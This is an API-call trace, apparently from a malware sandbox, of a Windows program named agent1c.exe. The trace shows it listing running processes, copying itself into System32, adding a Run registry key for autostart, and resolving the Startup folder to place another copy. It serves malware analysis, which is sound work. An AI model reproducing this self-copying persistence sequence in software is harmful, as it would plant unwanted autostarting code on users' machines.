[0030.818] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.819] lstrlenW (lpString="svchost.exe") returned 11 [0030.819] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.819] lstrlenW (lpString="svchost.exe") returned 11 [0030.819] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0030.820] lstrlenW (lpString="dwm.exe") returned 7 [0030.820] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0030.820] lstrlenW (lpString="explorer.exe") returned 12 [0030.820] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0030.821] lstrlenW (lpString="spoolsv.exe") returned 11 [0030.821] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.821] lstrlenW (lpString="taskhost.exe") returned 12 [0030.821] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.822] lstrlenW (lpString="svchost.exe") returned 11 [0030.822] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0030.823] lstrlenW (lpString="taskeng.exe") returned 11 [0030.823] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.823] lstrlenW (lpString="taskhost.exe") returned 12 [0030.823] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0030.824] lstrlenW (lpString="entrepreneur.exe") returned 16 [0030.824] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0030.824] lstrlenW (lpString="andrew kinds.exe") returned 16 [0030.824] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0030.825] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0030.825] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0030.826] lstrlenW (lpString="educated.exe") returned 12 [0030.826] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0030.826] lstrlenW (lpString="servers.exe") returned 11 [0030.826] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0030.827] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0030.827] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0030.827] lstrlenW (lpString="gbp_chair.exe") returned 13 [0030.827] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0030.828] lstrlenW (lpString="attention infected.exe") returned 22 [0030.828] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0030.828] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0030.828] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0030.829] lstrlenW (lpString="pattern amateur.exe") returned 19 [0030.829] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0030.829] lstrlenW (lpString="referral.exe") returned 12 [0030.829] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0030.830] lstrlenW (lpString="copyingseems.exe") returned 16 [0030.830] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0030.830] lstrlenW (lpString="spin generally.exe") returned 18 [0030.830] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0030.831] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0030.831] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0030.831] lstrlenW (lpString="transmit.exe") returned 12 [0030.832] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0030.832] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0030.832] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0030.833] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0030.833] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0030.833] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0030.833] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0030.834] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0030.834] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0030.834] lstrlenW (lpString="delight.exe") returned 11 [0030.834] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0030.835] lstrlenW (lpString="within enquiry.exe") returned 18 [0030.835] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0030.835] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0030.835] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.836] lstrlenW (lpString="dllhost.exe") returned 11 [0030.836] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.836] lstrlenW (lpString="dllhost.exe") returned 11 [0030.836] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0030.837] lstrlenW (lpString="agent1c.exe") returned 11 [0030.837] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 0 [0030.837] CloseHandle (hObject=0xe0) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625270 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6252b8 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625300 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625320 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625368 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a08 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604720 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604758 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604350 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604378 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6047a0 | out: hHeap=0x5f0000) returned 1 [0030.838] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6043a0 | out: hHeap=0x5f0000) returned 1 [0030.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x62b430 [0030.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x63b438 [0030.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.838] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x6043a0 [0030.838] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6043a0, Size=0x40) returned 0x6269b0 [0030.838] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x6043a0 [0030.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x604378 [0030.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x604350 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604350, Size=0x40) returned 0x6269f8 [0030.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x63b438, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe")) returned 0x31 [0030.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x64b440 [0030.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x65b448 [0030.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x604350 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604350, Size=0x40) returned 0x626a40 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626a40, Size=0x80) returned 0x625270 [0030.839] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625270, Size=0x100) returned 0x627bb8 [0030.839] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627bb8 | out: hHeap=0x5f0000) returned 1 [0030.840] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\agent1c.exe", lpDst=0x64b440, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\agent1c.exe") returned 0x20 [0030.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65b448 | out: hHeap=0x5f0000) returned 1 [0030.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b440 | out: hHeap=0x5f0000) returned 1 [0030.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x20e0020 [0030.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.840] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x604350 [0030.840] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.840] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x625938 [0030.840] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.840] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.840] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0030.840] lstrlenW (lpString="kernel32.dll") returned 12 [0030.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604350 | out: hHeap=0x5f0000) returned 1 [0030.840] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.840] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0030.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0030.841] CreateFileW (lpFileName="C:\\Windows\\System32\\agent1c.exe" (normalized: "c:\\windows\\system32\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0030.845] ReadFile (in: hFile=0xe0, lpBuffer=0x20e0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.858] WriteFile (in: hFile=0xe4, lpBuffer=0x20e0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.861] ReadFile (in: hFile=0xe0, lpBuffer=0x20e0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0030.861] CloseHandle (hObject=0xe4) returned 1 [0030.863] CloseHandle (hObject=0xe0) returned 1 [0030.863] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.863] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x625938 [0030.863] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.863] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x6258e8 [0030.863] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.863] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.863] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.863] lstrlenW (lpString="kernel32.dll") returned 12 [0030.863] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6258e8 | out: hHeap=0x5f0000) returned 1 [0030.863] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.863] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0030.863] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x20e0020 | out: hHeap=0x5f0000) returned 1 [0030.867] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.867] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x625938 [0030.868] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625938, Size=0x40) returned 0x626a40 [0030.868] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626a40, Size=0x80) returned 0x64b458 [0030.868] lstrlenW (lpString="C:\\Windows\\System32\\agent1c.exe") returned 31 [0030.868] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0030.868] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5c) returned 0x625270 [0030.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0030.868] RegSetValueExW (in: hKey=0xe0, lpValueName="agent1c.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\agent1c.exe", cbData=0x3e | out: lpData="C:\\Windows\\System32\\agent1c.exe") returned 0x0 [0030.869] RegCloseKey (hKey=0xe0) returned 0x0 [0030.869] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625270 | out: hHeap=0x5f0000) returned 1 [0030.869] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0030.869] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b458 | out: hHeap=0x5f0000) returned 1 [0030.869] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x64d440 [0030.869] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x65d448 [0030.869] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a08 [0030.869] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a08, Size=0x20) returned 0x625938 [0030.869] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625938, Size=0x40) returned 0x626a40 [0030.869] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626a40, Size=0x80) returned 0x64b458 [0030.869] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x627bb8 [0030.869] lstrlenW (lpString="") returned 0 [0030.869] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.869] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8c) returned 0x627cc0 [0030.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe0) returned 0x0 [0030.869] RegQueryValueExW (in: hKey=0xe0, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x65d448, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x65d448*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 [0030.869] RegCloseKey (hKey=0xe0) returned 0x0 [0030.870] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627cc0 | out: hHeap=0x5f0000) returned 1 [0030.870] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.870] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8c) returned 0x627cc0 [0030.870] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0030.870] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x65d448, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0030.870] RegCloseKey (hKey=0xe4) returned 0x0 [0030.870] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627cc0 | out: hHeap=0x5f0000) returned 1 [0030.870] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0030.870] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.870] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627bb8 | out: hHeap=0x5f0000) returned 1 [0030.870] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe", lpDst=0x64d440, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe") returned 0x68 [0030.870] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d448 | out: hHeap=0x5f0000) returned 1 [0030.870] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64d440 | out: hHeap=0x5f0000) returned 1 [0030.870] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x20e0020 